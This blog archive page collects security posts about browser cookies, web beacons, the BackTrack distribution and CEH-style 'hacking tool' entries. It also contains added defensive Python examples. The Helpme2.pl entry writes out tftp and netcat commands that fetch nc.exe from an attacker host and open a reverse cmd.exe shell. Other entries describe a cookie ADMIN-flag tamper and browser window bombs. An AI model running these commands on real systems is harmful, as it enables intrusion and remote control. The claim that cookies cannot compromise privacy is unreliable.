Showing posts with label Cookies. Show all posts

Tuesday, February 14, 2012

Backtrack 4 Download for Windows VMWare & Torrents

BackTrack is a live CD Linux distribution that focuses on penetration testing. A merger of two older security-related distros — Whax and Auditor Security Collection — BackTrack bundles more than 300 security tools.

BackTrack is based on the SLAX distribution (a live CD derived from Slackware) and runs a patched 2.6.20 kernel. It offers users both KDE and Fluxbox desktop environments.
To start using BackTrack, download the ISO image and burn it to a CD. Insert the disc and boot your machine. Once booted, the system starts at runlevel 3 (text mode), where you must log in as root and choose whether to start KDE or Fluxbox or just use the terminal.

BackTrack provides clear, concise instructions for logging in, starting the window manager, and configuring the video card before you see the login prompt. If you’ve never used BackTrack before, use a graphical environment, since it will help you understand how all the included applications are organized and let you take advantage of some graphical utilities. When the window manager comes up you’ll find some ordinary desktop programs, such as Firefox, Gaim, K3b, and XMMS, within a nice environment with beautiful wallpaper and window transparency.

Don’t let the attractive appearance fool you — BackTrack packs a punch. The security tools are arranged inside a Backtrack submenu. This is a big improvement over older releases, because you can easily follow an attack methodology: starting by collecting information and ending by hiding your actions.

The tools are arranged in 12 categories, such as vulnerability identification, penetration, privilege escalation, radio network analysis, and reverse engineering. Among the more than 300 security tools you’ll find such familiar names as the Metasploit Framework, Kismet, Nmap, Ettercap, and Wireshark (previously known as Ethereal).

One of the core points of this release is the attention to detail. For example, when you choose most of the programs from the Backtrack menu, a console window opens with the output of the program’s help. Some tools have been bundled with scripts that in a few steps configure and run the program for you. For example, if you run the Snort intrusion detection application, a script asks for some passwords and then sets up MySQL, Apache, Base, and Snort itself so you can easily browse alert logs via a Web browser.

If you open Firefox or Konqueror you’ll find some useful security-oriented bookmarks. In the Documents submenu the developers have included PDF manuals for the ISSAF and OSSTMM security methodologies. There are also some tools that you wouldn’t expect inside a live CD; for example, you have a popular debugger for Windows, OllyDbg, which runs fine through Wine, so you can even debug .exe files.

If you like the live CD, you can install BackTrack to a hard drive (decompressed, it requires 2.7GB of space) or USB memory stick (compressed, 700MB) using a graphical wizard.
While BackTrack is an excellent tool, nothing is perfect. Unfortunately it doesn’t include Nessus, the popular security scanner, due to license problems. I tried to start PostgreSQL from the Services menu, but it gave an error. And it seems as if the developers forgot to update the Backtrack menu in Fluxbox, because it offers the previous version arrangement. Tools like VMware and Nessus appear on the menu but are broken links because they have been removed from this release.

Despite a few little bugs and problems, BackTrack is the best distribution I’ve found for handling security-oriented tasks out of the box.

Download Links :

Last Update: 11.01.2010
Description: Image Download
Name: bt4-final.iso
Size: 1570 MB
MD5: af139d2a085978618dc53cabc67b9269



Description: VM Image Download
Name: bt4-final-vm.zip
Size: 2000 MB
MD5: 733b47fad1d56d31bc63c16b3706a11c




Friday, March 18, 2011

Cookies are bad for privacy - Is that true?

This is a myth - cookies are a friendly internet tool primarily used by the advertising and e-commerce industry to make surfing easier and quicker. They have several roles, none of which can compromise your privacy:
  1. Protection - to ensure you are a genuine visitor and not someone else using your password.
  2. Authenticate and speed up your identification and e-commerce transactions.
  3. Recognise preferences e.g. remember user names and passwords for websites.
  4. Cap the frequency of ad serving and make sure that advertisements are rotated and not duplicated during any one visit to a site.
Many websites use the services of other companies to provide the content and services on their website. These third parties may provide content or services to more than one website. If they are using cookies, in theory, they can understand what that cookie does on a number of different sites.

What are Web Beacons OR Web Bugs?

Web beacons, also called web bugs and clear GIFs, are used in combination with cookies to help people running websites to understand the behaviour of their customers. A web beacon is typically a transparent graphic image (usually 1 pixel x 1 pixel) that is placed on a site or in an email.

The use of a web beacon allows the site to record the simple action of the user opening the page that contains the beacon. The beacon is one of the ingredients of the page, just like other images and text, except it is so small and clear that it is effectively invisible. Web pages and graphical emails use presentation code that tells your computer what to do when a page is opened. While they may contain some of the text that you see on the screen, they typically contain a number of instructions, or 'tags', that then ask the website's server to send you further content (such as an image or a block of text that changes frequently). Web beacons are retrieved in the same way, and the action of calling the material from another server allows the event to be counted.

When a user's browser requests information from a website in this way certain simple information can also be gathered, such as: the IP address of your computer; time the material was viewed; the type of browser that retrieved the image; and the existence of cookies previously set by that server. This is information that is available to any web server you visit. Web beacons do not give any "extra" information away. They are simply a convenient way of gathering the simplest of statistics and managing cookies.

Web beacons are typically used by a third party to monitor the activity of a site. Turning off the browser's cookies will prevent web beacons from tracking your specific activity. The web beacon may still record an anonymous visit from your IP address, but unique information will not be recorded.

For example a company owning a network of sites may use web beacons in order to count and recognise users travelling around its network. Rather than gathering statistics and managing cookies on all their servers separately, they can use web beacons to keep them all together. Being able to recognise you enables the site owner to personalise your visit and make it more user friendly.
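The beacon pattern described above can be spotted in page or email markup. The following is an added example, not part of the original post: it lists images that are 1x1 or hidden and marks those fetched from a different host. The host names and sample markup are constructed, and "third party" is simplified to "host differs from the page host".

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page, imagined as served from www.example.test.
SAMPLE_HTML = """
<img src="https://www.example.test/logo.png" width="120" height="40">
<img src="https://stats.tracker.test/b.gif?uid=42" width="1" height="1">
<img src="/px.gif" height="1" width="1" />
<img src="https://ads.tracker.test/p.gif" style="display: none">
"""

def _pixels(value):
    """Parse a width/height attribute such as '1' or '1px'; None if absent or not numeric."""
    digits = (value or "").strip().lower().replace("px", "")
    return int(digits) if digits.isdigit() else None

class BeaconFinder(HTMLParser):
    """Collects <img> tags that render as invisible or 1x1 images."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []          # list of (src, is_third_party)

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        attr = {name: value or "" for name, value in attrs}
        width, height = _pixels(attr.get("width")), _pixels(attr.get("height"))
        style = attr.get("style", "").replace(" ", "").lower()
        tiny = width is not None and height is not None and width <= 1 and height <= 1
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            # A relative src has no host of its own, so it belongs to the page host.
            host = (urlparse(attr.get("src", "")).hostname or self.page_host).lower()
            self.findings.append((attr.get("src", ""), host != self.page_host))

def find_beacons(html, page_host):
    finder = BeaconFinder(page_host)
    finder.feed(html)
    return finder.findings

if __name__ == "__main__":
    for src, third_party in find_beacons(SAMPLE_HTML, "www.example.test"):
        print("third-party" if third_party else "first-party", src)
```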

Why do websites use Web Beacons?

Web beacons are used by website owners to log activity on their web pages and websites. Their purpose depends on what a site wants to understand about how visitors interact with pages.

Learn How to Collect and Analyze Cookies Using COOKIEDIGGER

CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, is included in the cookie values.


SOURCE: http://www.foundstone.com
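The three checks named above (entropy, predictability, embedded credentials) can be sketched in a few functions. This is an added example, not CookieDigger's code and not part of the original post; the tokens, account name and password are constructed test data, and it is meant for assessing an application you are responsible for.

```python
import base64
import math
import re
from collections import Counter

def position_entropy(tokens):
    """Shannon entropy in bits of the characters observed at each position.
    With n samples no position can score above log2(n), so collect many."""
    result = []
    for column in zip(*tokens):            # stops at the shortest token
        total = len(column)
        counts = Counter(column).values()
        result.append(-sum(c / total * math.log2(c / total) for c in counts))
    return result

def constant_step(tokens):
    """Step between trailing integers if they form an arithmetic series, else None."""
    matches = [re.search(r"\d+$", t) for t in tokens]
    if len(tokens) < 3 or not all(matches):
        return None
    numbers = [int(m.group()) for m in matches]
    steps = {b - a for a, b in zip(numbers, numbers[1:])}
    return steps.pop() if len(steps) == 1 else None

def decoded_views(token):
    """The token as issued, plus its base64 and hex decodings where they parse."""
    views = [token]
    for decode in (base64.b64decode, bytes.fromhex):
        try:
            views.append(decode(token).decode("utf-8", "ignore"))
        except ValueError:                 # binascii.Error is a ValueError
            pass
    return views

def leaked_fields(token, credentials):
    """Names of credential fields whose value is visible in any view of the token."""
    return sorted(name for name, secret in credentials.items()
                  if any(secret in view for view in decoded_views(token)))

def assess(tokens, credentials):
    return {
        "entropy_bits": round(sum(position_entropy(tokens)), 2),
        "step": constant_step(tokens),
        "leaks": sorted({f for t in tokens for f in leaked_fields(t, credentials)}),
    }

# Constructed samples: tokens issued to one test account on three logins.
CREDS = {"username": "alice", "password": "s3cret!"}
COUNTER_TOKENS = ["SID1000417", "SID1000421", "SID1000425"]
ENCODED_TOKEN = base64.b64encode(b"alice:s3cret!").decode()

if __name__ == "__main__":
    print(assess(COUNTER_TOKENS, CREDS))
    print(leaked_fields(ENCODED_TOKEN, CREDS))
```

A token that scores only a few bits across many samples, or that steps by a constant, can be guessed by anyone who has seen one valid value.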

Download Free Internet Explorer Cookie Forensic Analysis Tool: GALLETA

Many important files within Microsoft Windows have structures that are undocumented. One of the principles of computer forensics is that all analysis methodologies must be well documented and repeatable, and they must have an acceptable margin of error. Currently, there is a lack of open source methods and tools that forensic analysts can rely upon to examine the data found in proprietary Microsoft files.

Many computer crime investigations require the reconstruction of a subject's Internet Explorer Cookie files. Since this analysis technique is executed regularly, we researched the structure of the data found in the cookie files. Galleta, the Spanish word meaning "cookie", was developed to examine the contents of the cookie files. The foundation of Galleta's examination methodology will be documented in an upcoming whitepaper. Galleta will parse the information in a Cookie file and output the results in a field delimited manner so that it may be imported into your favorite spreadsheet program. Galleta is built to work on multiple platforms and will execute on Windows (through Cygwin), Mac OS X, Linux, and *BSD platforms.

Usage: galleta [options]
-t Field Delimiter (TAB by default)

Example Usage:

[kjones:galleta/galleta_20030410_1/bin] kjones% ./galleta antihackertoolkit.txt > cookies.txt

Open cookies.txt as a TAB-delimited file in MS Excel to further sort and filter your results.


SOURCE: http://www.foundstone.com

What is a Cookie?

Persistent vs. Non-Persistent

Persistent cookies are stored in a text file (cookies.txt under Netscape and multiple *.txt files for Internet Explorer) on the client and are valid for as long as the expiry date is set for (see below). Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed or the cookie is explicitly killed by a log-off script.

Secure vs. Non-Secure

Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over HTTPS or regular HTTP. The title of secure is somewhat misleading. It only provides transport security. Any data sent to the client should be considered under the total control of the end user, regardless of the transport mechanism in use.

Cookies can be set using two main methods, HTTP headers and JavaScript. JavaScript is becoming a popular way to set and read cookies as some proxies will filter cookies set as part of an HTTP response header. Cookies enable a server and browser to pass information among themselves between sessions. Remember that HTTP is stateless, so this may simply be between requests for documents in the same session or even when a user requests an image embedded in a page. It is rather like a server stamping a client and saying "show this to me next time you come in". Cookies cannot be shared (read or written) across DNS domains.

In correct client operation Domain A can't read Domain B's cookies, but there have been many vulnerabilities in popular web clients which have allowed exactly this. Under HTTP the server responds to a request with an extra header. This header tells the client to add this information to the client's cookies file or store the information in RAM. After this, all requests to that URL from the browser will include the cookie information as an extra header in the request.

Cookie Structure

domain: The website domain that created and that can read the variable.

flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.

path: The path attribute supplies a URL range for which the cookie is valid. If path is set to /reference, the cookie will be sent for URLs in /reference as well as sub-directories such as /reference/web protocols. A pathname of "/" indicates that the cookie will be used for all URLs at the site from which the cookie originated.

secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.

expiration: The time that the variable will expire on. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed.

name: The name of the variable (in this case Apache).

The limit on the size of each cookie (name and value combined) is 4 kb. A maximum of 20 cookies per server or domain is allowed.
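The fields listed above are the columns of a TAB-separated cookies.txt line. The following added example (not from the original post) parses such lines, applies the path rule, and reports the properties the text describes. The sample lines are constructed, the seventh column is the cookie value, and treating an expiry of 0 as a session cookie is an assumption of this example.

```python
from collections import Counter, namedtuple

Cookie = namedtuple("Cookie", "domain flag path secure expires name value")

# Constructed sample in the TAB-separated cookies.txt layout; the seventh
# column is the value. Expiry 0 marks a session cookie here (an assumption
# of this example, matching how curl writes its cookie jar).
SAMPLE = (
    "# Netscape HTTP Cookie File\n"
    ".example.test\tTRUE\t/\tFALSE\t1893456000\tSESSIONID\tabc123\n"
    "shop.example.test\tFALSE\t/reference\tTRUE\t0\tlang\ten-us\n"
)

MAX_COOKIE_BYTES = 4096      # "4 kb" for name and value combined
MAX_PER_DOMAIN = 20

def parse_cookies(text):
    cookies = []
    for number, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 7:
            raise ValueError(f"line {number}: expected 7 fields, got {len(fields)}")
        domain, flag, path, secure, expires, name, value = fields
        cookies.append(Cookie(domain, flag == "TRUE", path, secure == "TRUE",
                              int(expires), name, value))
    return cookies

def sent_for(cookie, url_path):
    """Path rule from the text: /reference covers /reference and anything below it."""
    base = cookie.path.rstrip("/")
    return url_path == base or url_path.startswith(base + "/")

def audit(cookies):
    """Return (cookie name, finding) pairs for the properties the text describes."""
    findings = []
    per_domain = Counter(c.domain for c in cookies)
    for c in cookies:
        if not c.secure:
            findings.append((c.name, "not marked secure: also sent over plain HTTP"))
        if c.expires > 0:
            findings.append((c.name, "persistent: written to disk until expiry"))
        if len(c.name.encode()) + len(c.value.encode()) > MAX_COOKIE_BYTES:
            findings.append((c.name, "name and value exceed 4 KB"))
        if per_domain[c.domain] > MAX_PER_DOMAIN:
            findings.append((c.name, "domain holds more than 20 cookies"))
    return findings

if __name__ == "__main__":
    for name, finding in audit(parse_cookies(SAMPLE)):
        print(f"{name}: {finding}")
```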

Cookies are the preferred method to maintain state in the HTTP protocol. They are, however, also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure, can be modified by the client and sent to the server with URL requests. Therefore any attacker can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified, but this is not true; tools like Winhex are freely available. SSL also only protects the cookie in transit.

The extent of cookie manipulation depends on what the cookie is used for but usually ranges from session tokens to arrays that make authorization decisions.

A real-world example

Cookie: lang=en-us; ADMIN=no; y=1; time=10:30GMT;

The attacker can simply modify the cookie to:

Cookie: lang=en-us; ADMIN=yes; y=1; time=12:30GMT;
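The server-side view of that edit, as an added example that is not part of the original post: a check that trusts the ADMIN field as sent, beside one that only accepts fields carrying a valid HMAC issued by the server. The function names, the "sig" field and the key are constructed for illustration.

```python
import hashlib
import hmac

# Constructed demo key; a real key is random and kept out of source code.
SERVER_KEY = b"constructed-demo-key"

def parse_cookie_header(header):
    """Split 'a=1; b=2;' into a dict, ignoring empty segments."""
    pairs = (item.split("=", 1) for item in header.split(";") if "=" in item)
    return {name.strip(): value.strip() for name, value in pairs}

def naive_is_admin(header):
    # Pattern from the text: the authorization decision is read from client data.
    return parse_cookie_header(header).get("ADMIN") == "yes"

def sign(fields):
    """HMAC-SHA256 over the fields in a fixed (sorted) order."""
    payload = ";".join(f"{name}={fields[name]}" for name in sorted(fields))
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()

def issue(fields):
    """Cookie value the server sends: the fields plus their signature."""
    signed = {**fields, "sig": sign(fields)}
    return "; ".join(f"{name}={value}" for name, value in signed.items())

def verified_fields(header):
    """Return the fields only if the signature matches, otherwise None."""
    fields = parse_cookie_header(header)
    presented = fields.pop("sig", "")
    if not hmac.compare_digest(presented.encode(), sign(fields).encode()):
        return None
    return fields

def hardened_is_admin(header):
    fields = verified_fields(header)
    return fields is not None and fields.get("ADMIN") == "yes"

if __name__ == "__main__":
    cookie = issue({"lang": "en-us", "ADMIN": "no", "y": "1"})
    tampered = cookie.replace("ADMIN=no", "ADMIN=yes")
    print("naive check accepts the edit:   ", naive_is_admin(tampered))
    print("hardened check accepts the edit:", hardened_is_admin(tampered))
```

Signing only detects modification. Keeping the role in server-side session state, looked up by a random session identifier, removes the field from the client altogether.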

Hacking Tool: Helpme2.pl
  • Helpme2.pl is exploit code for the WinHelp32.exe Remote Buffer Overrun vulnerability.

  • This tool generates an HTML file with a given hidden command.

  • When this HTML file is sent to a victim through email, it infects the victim's computer and executes the hidden code.

Helpme2.pl is exploit code written to take advantage of the winhelp32.exe vulnerability. The Perl script takes a command to execute (WinExec, SW_HIDE) and gives an HTML output file. There are two versions:

HelpMe.pl was written to work with kernel32.dll version 5.0.2195.4272, while HelpMe2.pl was written to work with kernel32.dll version 5.0.2195.2778

The exploit does the following:

  1. Executes tftp.exe -i attacker.ip.address get nc.exe c:\winnt\system32\nc.exe

  2. Executes nc.exe attacker.ip.address 80 -e cmd.exe

This code generates an HTML file with a given hidden command. When the HTML file is sent to a victim through email, it infects the victim's computer and executes the hidden code.

Hacking Tool: WindowBomb


An email sent with such HTML files attached will create pop-up windows until the PC's memory is exhausted.

Window bombs are code written to cause annoying behavior on the user's computer screen. Examples include:

Deadly image

A GIF which crashes the browser on clicking.

Uncloseable window

Opens a document that utilizes the JavaScript Unload event handler to reopen the document if you try to leave or close the window.

Invincible alert dialogue

Executes a function which generates an alert dialogue and then runs the function again.

Reload-o-rama

Refreshes the document from the history 1000 times/second, leaving the back and stop buttons useless.

Window spawner

Continuously opens new windows until the ram or swap space is full.

Jiggy window

Causes the window to dance around on the screen so fast that the controls cannot be reached.

Jiggy window spawner

Creates an endless stream of little dancing windows.

While loop processor hog

Executes an endless loop to chew up some processor time.

Recursive frames

Opens a set of recursive frames until the ram or swap space is full.

Memory bomb

Dynamically allocates ram to the browser until the ram or swap space is full.

Super memory bomb

Opens a 100K document with numerous recursive tables and ordered lists.

Hacking Tool: IEEN

http://www.securityfriday.com/ToolDownload/IEen

  • IEEN remotely controls Internet Explorer using DCOM.

  • If you know the account name and the password of a remote machine, you can remotely control the software components on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled.

IEEN: The Distributed Component Object Model (DCOM) is a protocol that enables software components to communicate directly over a network in a reliable, secure, and efficient manner. DCOM is installed on most Windows machines by default and runs without being noticed by users.

However, if an attacker knows the account name and the password of a remote machine, he can remotely control the software components on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled. IE'en is a tool that can be used to remotely control Internet Explorer using DCOM.

Summary of IE'en Functionalities:

  • Remotely connects to or activates Internet Explorer

  • Captures data sent and received using Internet Explorer

  • Even on SSL-encrypted websites (e.g. Hotmail), IE'en can capture user ID and password in plain text.

  • Change the web page on the remote IE window.

  • Make the remote IE window visible / invisible

---------------------------------------------------------------------------------------------

Summary
  • Attacking web applications is the easiest way to compromise hosts, networks and users.

  • Generally nobody notices web application penetration, until serious damage has been done.

  • Web application vulnerabilities can be eliminated to a great extent by ensuring proper design specifications and coding practices as well as implementing common security procedures.

  • Various tools help the attacker to view the source codes and scan for security holes.

  • The first rule in web application development from a security standpoint is not to rely on client-side data for critical processes. Using an encrypted session such as SSL / "secure" cookies is advocated instead of using hidden fields, which are easily manipulated by attackers.

  • A cross-site scripting vulnerability is caused by the failure of a web based application to validate user supplied input before returning it to the client system.

  • If the application accepts only expected input, then the XSS can be significantly reduced.

---Regards,
Amarjit Singh

 